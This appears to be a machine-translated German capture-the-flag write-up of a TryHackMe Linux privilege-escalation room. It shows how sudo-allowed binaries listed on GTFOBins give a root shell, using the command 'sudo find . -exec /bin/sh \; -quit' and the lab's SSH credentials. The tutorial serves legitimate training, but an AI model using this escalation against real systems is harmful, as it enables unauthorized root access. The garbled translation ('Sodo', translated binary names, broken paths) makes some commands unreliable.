Dieses Mal werden wir versuchen, Privilegien mit "GTFOBINS" zu eskalieren.
Die Zielmaschine nutzt den Raum unten von TryHackme.
"Tryhackme-linux privesc: https://tryhackme.com/room/linuxprivesc "

Dieser Artikel ist Teil 3.
Wenn Sie die Schreiben für Linux Privesc mit TryHackme überprüfen möchten, überprüfen Sie bitte auch Erhöhung der Berechtigungen mit gefährdeten Dateiberechtigungen unter Linux




Vorbereitung
Starten der Zielmaschine
Starten Sie zuerst die Zielmaschine.
"Tryhackme-linux privesc: https://tryhackme.com/room/linuxprivesc bei

Wenn die IP -Adresse so angezeigt wird, ist das Booten in Ordnung.

SSH -Verbindung
Stellen Sie eine Verbindung zu der Zielmaschine her, die Sie mit SSH begonnen haben.
Wie erläutert, ist es in Ordnung, solange Sie mit "Benutzer: password321" eine Verbindung herstellen können.
└─ $ ssh user@10.10.6.35 Die Authentizität von Host '10 .10.6.35 (10.10.6.35) kann nicht festgelegt werden. DSA -Schlüsselfingerabdruck ist SHA256: p2nSSfvyjvk1qe0TSNX5G2H8AAWYRN71JDZ3UEODBMA. Dieser Schlüssel ist in keinen anderen Namen bekannt. Sind Sie sicher, dass Sie sich weiter verbinden möchten (ja/nein/[Fingerabdruck])? Ja Warnung: Dauerhaft '10 .10.6.35 '(DSA) in die Liste der bekannten Hosts hinzugefügt. user@10.10.6.35's Passwort: Linux Debian 2.6.32-5-AMD64 #1 SMP TUE 13. Mai 16:34:35 UTC 2014 x86_64 Die mit dem Debian GNU/Linux-System enthaltenen Programme sind kostenlose Software. Die genauen Verteilungsbegriffe für jedes Programm werden in den einzelnen Dateien in/usr/share/doc/*/copyright beschrieben. Debian GNU/Linux verfügt über eine Garantie, sofern dies nach geltendem Recht zulässig ist. Letzte Login: Fr 15. Mai 06:41:23 2020 von 192.168.1.125 Benutzer@Debian: ~ $ sudo -l Matching -Standardeinträge für den Benutzer auf diesem Host: env_reset, env_keep+= ld_preload, env_keep+= ld_library_path
Möglicherweise müssen Sie "-OHostKeyAlgorithmen =+SSH-RSA" hinzufügen.
Erhöhung des Privilegs mit GTFOBINs
Jetzt möchte ich versuchen, Privilegien mit GTFOBINs zu eskalieren.
Wie viele Programme darf „Benutzer“ über sudo ausgeführt werden? (Wie viele Programme gibt es Programme, die "Benutzer" über sudo ausgeführt werden können?)
Zunächst möchte ich ein Programm erhalten, das Benutzer in Sodo ausführen können.
Der Befehl ist "Sodo -l".
user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH User user may run the following commands on this host: (root) NOPASSWD: /usr/sbin/iftop (root) NOPASSWD: /usr/bin/find (root) NOPASSWD: /usr/bin/nano (root) nopasswd:/usr/bin/vim (root) nopasswd:/usr/mAN (root) nopasswd:/usr/bin/awk (root) nopasswd:/usr/bin/weniger (root) nopasswd:/usr/bin/ftp (root) nopasswd. Nopasswd:/usr/sbin/apache2 (root) nopasswd:/bin/mehr
Ich fand, dass die oben genannten 11 Programme in Sodo ausgeführt werden können.

Ein Programm auf der Liste hat keine Shell Escape -Sequenz auf GTFOBINs. Was ist das?
Suchen Sie als nächstes nach Programmen, die keine Shell -Fluchtsequenz haben.
(Ich denke, es ist wie die Suche nach einem Programm mit einer Shell Escape -Sequenz.)
Als ich nach jedem suchte, stellte ich fest, dass es kein "Apache2" gab.

Die Antwort lautet "Apache2".

Versuchen Sie, Privilegien mit GTFOBINs zu erhöhen
Lassen Sie uns nun versuchen, ihre Privilegien tatsächlich zu eskalieren.
Es sollte möglich sein, wenn die oben aufgeführten Elemente anders als "Apache2" sind. Diesmal werde ich es mit Find versuchen.
Suchen Sie zuerst nach Sodo und sehen Sie sich Sodo an.

Es scheint nur eine Frage der Ausführung des Befehls, also werde ich versuchen, ihn zu implementieren.

Benutzer@debian: ~ $ sudo find. -exec /bin /sh \; -quit sh-4.1# Whoami Root
Ich habe bestätigt, dass ich tatsächlich zur Wurzel erhöht wurde.
Es ist wirklich einfach. . . Ist es in Ordnung, so einfach zu sein? . .
Zusammenfassung
Dieses Mal haben wir versucht, Privilegien mit "GTFOBINS" zu eskalieren.
Es war ein bisschen enttäuschend, weil es sehr einfach war, Privilegien zu eskalieren, aber es scheint, als könnte es verwendet werden.
Referenzen und Websites
Medium ( Shamsher Khan ): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5